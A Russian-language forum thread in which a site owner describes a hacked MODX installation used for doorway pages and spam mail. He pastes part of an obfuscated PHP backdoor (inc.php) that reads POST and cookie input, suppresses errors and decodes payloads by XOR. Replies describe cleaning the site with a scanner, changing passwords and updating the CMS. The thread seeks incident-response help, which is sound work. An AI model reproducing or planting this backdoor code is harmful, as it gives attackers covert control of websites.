Взламывают сайт на MODX

Статус
В этой теме нельзя размещать новые ответы.

RAPCorp

Постоялец
Регистрация
12 Сен 2012
Сообщения
71
Реакции
10
Всем привет. Недавно столкнулся с такой проблемой, ломали MODX Evo. Перешёл на последнюю версию MODX Revo. Скидывали сначало файлы для генерации дорвеев, а потом начали рассылать почту, запарился очередь писем чистить, по 10к в очереди доходило. Не могу антивирусами обнаружить этот вирусняк. Файлы по разному называют, ещё изменяли .htaccess файл, добавляя пинги роботам с гугля, бинга и т.д.

inc.php
Код:
<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['m3d706'] = "\x2c\x2e\x55\x34\x5f\x76\x77\x56\x4f\x7a\x2b\x4b\x35\x6a\x30\x26\x71\x7b\x5e\x32\x47\x9\x3e\x5c\x21\x70\x7c\x44\x5d\x7e\x58\x69\x63\x75\x45\x24\x49\x4c\x7d\x3d\x29\x64\x59\x62\x73\x27\x51\x4d\x66\x74\x6c\x4a\x41\x2f\x22\x2d\x53\x60\x3b\x4e\x6e\x67\x3f\x2a\x36\x54\x68\x33\x6d\x46\x39\x52\x6b\x78\x3a\x23\x37\x65\x43\x40\x5b\xa\x48\x61\x3c\x20\x31\x72\x79\xd\x42\x28\x50\x25\x6f\x38\x57\x5a";
$GLOBALS[$GLOBALS['m3d706'][5].$GLOBALS['m3d706'][95].$GLOBALS['m3d706'][32].$GLOBALS['m3d706'][86].$GLOBALS['m3d706'][70].$GLOBALS['m3d706'][43].$GLOBALS['m3d706'][43].$GLOBALS['m3d706'][12].$GLOBALS['m3d706'][83]] = $GLOBALS['m3d706'][32].$GLOBALS['m3d706'][66].$GLOBALS['m3d706'][87];
$GLOBALS[$GLOBALS['m3d706'][6].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][67].$GLOBALS['m3d706'][76].$GLOBALS['m3d706'][48].$GLOBALS['m3d706'][76].$GLOBALS['m3d706'][64]] = $GLOBALS['m3d706'][94].$GLOBALS['m3d706'][87].$GLOBALS['m3d706'][41];
$GLOBALS[$GLOBALS['m3d706'][66].$GLOBALS['m3d706'][64].$GLOBALS['m3d706'][67].$GLOBALS['m3d706'][76].$GLOBALS['m3d706'][48].$GLOBALS['m3d706'][48].$GLOBALS['m3d706'][64]] = $GLOBALS['m3d706'][44].$GLOBALS['m3d706'][49].$GLOBALS['m3d706'][87].$GLOBALS['m3d706'][50].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][60];
$GLOBALS[$GLOBALS['m3d706'][44].$GLOBALS['m3d706'][86].$GLOBALS['m3d706'][64].$GLOBALS['m3d706'][3]] = $GLOBALS['m3d706'][31].$GLOBALS['m3d706'][60].$GLOBALS['m3d706'][31].$GLOBALS['m3d706'][4].$GLOBALS['m3d706'][44].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][49];
$GLOBALS[$GLOBALS['m3d706'][5].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][32].$GLOBALS['m3d706'][32].$GLOBALS['m3d706'][19].$GLOBALS['m3d706'][14].$GLOBALS['m3d706'][76]] = $GLOBALS['m3d706'][44].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][87].$GLOBALS['m3d706'][31].$GLOBALS['m3d706'][83].$GLOBALS['m3d706'][50].$GLOBALS['m3d706'][31].$GLOBALS['m3d706'][9].$GLOBALS['m3d706'][77];
$GLOBALS[$GLOBALS['m3d706'][72].$GLOBALS['m3d706'][43].$GLOBALS['m3d706'][64].$GLOBALS['m3d706'][3].$GLOBALS['m3d706'][12].$GLOBALS['m3d706'][41]] = $GLOBALS['m3d706'][25].$GLOBALS['m3d706'][66].$GLOBALS['m3d706'][25].$GLOBALS['m3d706'][5].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][87].$GLOBALS['m3d706'][44].$GLOBALS['m3d706'][31].$GLOBALS['m3d706'][94].$GLOBALS['m3d706'][60];
$GLOBALS[$GLOBALS['m3d706'][72].$GLOBALS['m3d706'][14].$GLOBALS['m3d706'][95].$GLOBALS['m3d706'][76].$GLOBALS['m3d706'][14].$GLOBALS['m3d706'][67].$GLOBALS['m3d706'][70].$GLOBALS['m3d706'][95].$GLOBALS['m3d706'][12]] = $GLOBALS['m3d706'][33].$GLOBALS['m3d706'][60].$GLOBALS['m3d706'][44].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][87].$GLOBALS['m3d706'][31].$GLOBALS['m3d706'][83].$GLOBALS['m3d706'][50].$GLOBALS['m3d706'][31].$GLOBALS['m3d706'][9].$GLOBALS['m3d706'][77];
$GLOBALS[$GLOBALS['m3d706'][87].$GLOBALS['m3d706'][64].$GLOBALS['m3d706'][95].$GLOBALS['m3d706'][41].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][77]] = $GLOBALS['m3d706'][43].$GLOBALS['m3d706'][83].$GLOBALS['m3d706'][44].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][64].$GLOBALS['m3d706'][3].$GLOBALS['m3d706'][4].$GLOBALS['m3d706'][41].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][32].$GLOBALS['m3d706'][94].$GLOBALS['m3d706'][41].$GLOBALS['m3d706'][77];
$GLOBALS[$GLOBALS['m3d706'][68].$GLOBALS['m3d706'][86].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][14].$GLOBALS['m3d706'][76].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][12]] = $GLOBALS['m3d706'][44].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][49].$GLOBALS['m3d706'][4].$GLOBALS['m3d706'][49].$GLOBALS['m3d706'][31].$GLOBALS['m3d706'][68].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][4].$GLOBALS['m3d706'][50].$GLOBALS['m3d706'][31].$GLOBALS['m3d706'][68].$GLOBALS['m3d706'][31].$GLOBALS['m3d706'][49];
$GLOBALS[$GLOBALS['m3d706'][25].$GLOBALS['m3d706'][12].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][32].$GLOBALS['m3d706'][14]] = $GLOBALS['m3d706'][44].$GLOBALS['m3d706'][43].$GLOBALS['m3d706'][83].$GLOBALS['m3d706'][3];
$GLOBALS[$GLOBALS['m3d706'][9].$GLOBALS['m3d706'][70].$GLOBALS['m3d706'][70].$GLOBALS['m3d706'][48].$GLOBALS['m3d706'][43]] = $GLOBALS['m3d706'][87].$GLOBALS['m3d706'][48].$GLOBALS['m3d706'][76].$GLOBALS['m3d706'][32];
$GLOBALS[$GLOBALS['m3d706'][94].$GLOBALS['m3d706'][12].$GLOBALS['m3d706'][95].$GLOBALS['m3d706'][3].$GLOBALS['m3d706'][19].$GLOBALS['m3d706'][32].$GLOBALS['m3d706'][86].$GLOBALS['m3d706'][3].$GLOBALS['m3d706'][86]] = $_POST;
$GLOBALS[$GLOBALS['m3d706'][50].$GLOBALS['m3d706'][41].$GLOBALS['m3d706'][83].$GLOBALS['m3d706'][14].$GLOBALS['m3d706'][95]] = $_COOKIE;
@$GLOBALS[$GLOBALS['m3d706'][44].$GLOBALS['m3d706'][86].$GLOBALS['m3d706'][64].$GLOBALS['m3d706'][3]]($GLOBALS['m3d706'][77].$GLOBALS['m3d706'][87].$GLOBALS['m3d706'][87].$GLOBALS['m3d706'][94].$GLOBALS['m3d706'][87].$GLOBALS['m3d706'][4].$GLOBALS['m3d706'][50].$GLOBALS['m3d706'][94].$GLOBALS['m3d706'][61], NULL);
@$GLOBALS[$GLOBALS['m3d706'][44].$GLOBALS['m3d706'][86].$GLOBALS['m3d706'][64].$GLOBALS['m3d706'][3]]($GLOBALS['m3d706'][50].$GLOBALS['m3d706'][94].$GLOBALS['m3d706'][61].$GLOBALS['m3d706'][4].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][87].$GLOBALS['m3d706'][87].$GLOBALS['m3d706'][94].$GLOBALS['m3d706'][87].$GLOBALS['m3d706'][44], 0);
@$GLOBALS[$GLOBALS['m3d706'][44].$GLOBALS['m3d706'][86].$GLOBALS['m3d706'][64].$GLOBALS['m3d706'][3]]($GLOBALS['m3d706'][68].$GLOBALS['m3d706'][83].$GLOBALS['m3d706'][73].$GLOBALS['m3d706'][4].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][73].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][32].$GLOBALS['m3d706'][33].$GLOBALS['m3d706'][49].$GLOBALS['m3d706'][31].$GLOBALS['m3d706'][94].$GLOBALS['m3d706'][60].$GLOBALS['m3d706'][4].$GLOBALS['m3d706'][49].$GLOBALS['m3d706'][31].$GLOBALS['m3d706'][68].$GLOBALS['m3d706'][77], 0);
@$GLOBALS[$GLOBALS['m3d706'][68].$GLOBALS['m3d706'][86].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][14].$GLOBALS['m3d706'][76].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][12]](0);

$l2b6 = NULL;
$d11bdb1 = NULL;

$GLOBALS[$GLOBALS['m3d706'][6].$GLOBALS['m3d706'][3].$GLOBALS['m3d706'][83].$GLOBALS['m3d706'][32].$GLOBALS['m3d706'][64].$GLOBALS['m3d706'][41].$GLOBALS['m3d706'][86].$GLOBALS['m3d706'][32].$GLOBALS['m3d706'][48]] = $GLOBALS['m3d706'][95].$GLOBALS['m3d706'][86].$GLOBALS['m3d706'][95].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][64].$GLOBALS['m3d706'][48].$GLOBALS['m3d706'][32].$GLOBALS['m3d706'][12].$GLOBALS['m3d706'][55].$GLOBALS['m3d706'][70].$GLOBALS['m3d706'][43].$GLOBALS['m3d706'][83].$GLOBALS['m3d706'][64].$GLOBALS['m3d706'][55].$GLOBALS['m3d706'][3].$GLOBALS['m3d706'][76].$GLOBALS['m3d706'][83].$GLOBALS['m3d706'][41].$GLOBALS['m3d706'][55].$GLOBALS['m3d706'][95].$GLOBALS['m3d706'][76].$GLOBALS['m3d706'][12].$GLOBALS['m3d706'][48].$GLOBALS['m3d706'][55].$GLOBALS['m3d706'][95].$GLOBALS['m3d706'][19].$GLOBALS['m3d706'][67].$GLOBALS['m3d706'][70].$GLOBALS['m3d706'][95].$GLOBALS['m3d706'][3].$GLOBALS['m3d706'][86].$GLOBALS['m3d706'][14].$GLOBALS['m3d706'][64].$GLOBALS['m3d706'][12].$GLOBALS['m3d706'][86].$GLOBALS['m3d706'][76];
global $w4ac6d1cf;

function rf7c($l2b6, $wba4e0)
{
    $f96d = "";

    for ($jb747f=0; $jb747f<$GLOBALS[$GLOBALS['m3d706'][66].$GLOBALS['m3d706'][64].$GLOBALS['m3d706'][67].$GLOBALS['m3d706'][76].$GLOBALS['m3d706'][48].$GLOBALS['m3d706'][48].$GLOBALS['m3d706'][64]]($l2b6);)
    {
        for ($l1513=0; $l1513<$GLOBALS[$GLOBALS['m3d706'][66].$GLOBALS['m3d706'][64].$GLOBALS['m3d706'][67].$GLOBALS['m3d706'][76].$GLOBALS['m3d706'][48].$GLOBALS['m3d706'][48].$GLOBALS['m3d706'][64]]($wba4e0) && $jb747f<$GLOBALS[$GLOBALS['m3d706'][66].$GLOBALS['m3d706'][64].$GLOBALS['m3d706'][67].$GLOBALS['m3d706'][76].$GLOBALS['m3d706'][48].$GLOBALS['m3d706'][48].$GLOBALS['m3d706'][64]]($l2b6); $l1513++, $jb747f++)
        {
            $f96d .= $GLOBALS[$GLOBALS['m3d706'][5].$GLOBALS['m3d706'][95].$GLOBALS['m3d706'][32].$GLOBALS['m3d706'][86].$GLOBALS['m3d706'][70].$GLOBALS['m3d706'][43].$GLOBALS['m3d706'][43].$GLOBALS['m3d706'][12].$GLOBALS['m3d706'][83]]($GLOBALS[$GLOBALS['m3d706'][6].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][67].$GLOBALS['m3d706'][76].$GLOBALS['m3d706'][48].$GLOBALS['m3d706'][76].$GLOBALS['m3d706'][64]]($l2b6[$jb747f]) ^ $GLOBALS[$GLOBALS['m3d706'][6].$GLOBALS['m3d706'][77].$GLOBALS['m3d706'][67].$GLOBALS['m3d706'][76].$GLOBALS['m3d706'][48].$GLOBALS['m3d706'][76].$GLOBALS['m3d706'][64]]($wba4e0[$l1513]));
        }
    }

    return $f96d;
}
..............................

Вот содержимое этих помоешных файлов. Что-то мне подсказывает, что это кто-то с форума :)
 

RAPCorp

Постоялец
Регистрация
12 Сен 2012
Сообщения
71
Реакции
10
Вообщем проблема решилась тривиальным способом. Просканировал ai-bolit на предмет вирусов, вылетело 27 сообщений с указанием путей на файлы. Почистил всё основательно, в админке поменял пароли, также поменял пароли на БД, ну и естественно сам движок обновил до самой актуальной версии и проблема в итоге решилась.
 

bork75

The Team
Регистрация
21 Июн 2008
Сообщения
1.455
Реакции
734
На серче есть темка Общая тема о борьбе с шеллами и вирусами на сайте, там много полезного по защите сайта
Для просмотра ссылки Войди или Зарегистрируйся
 
Статус
В этой теме нельзя размещать новые ответы.
Сверху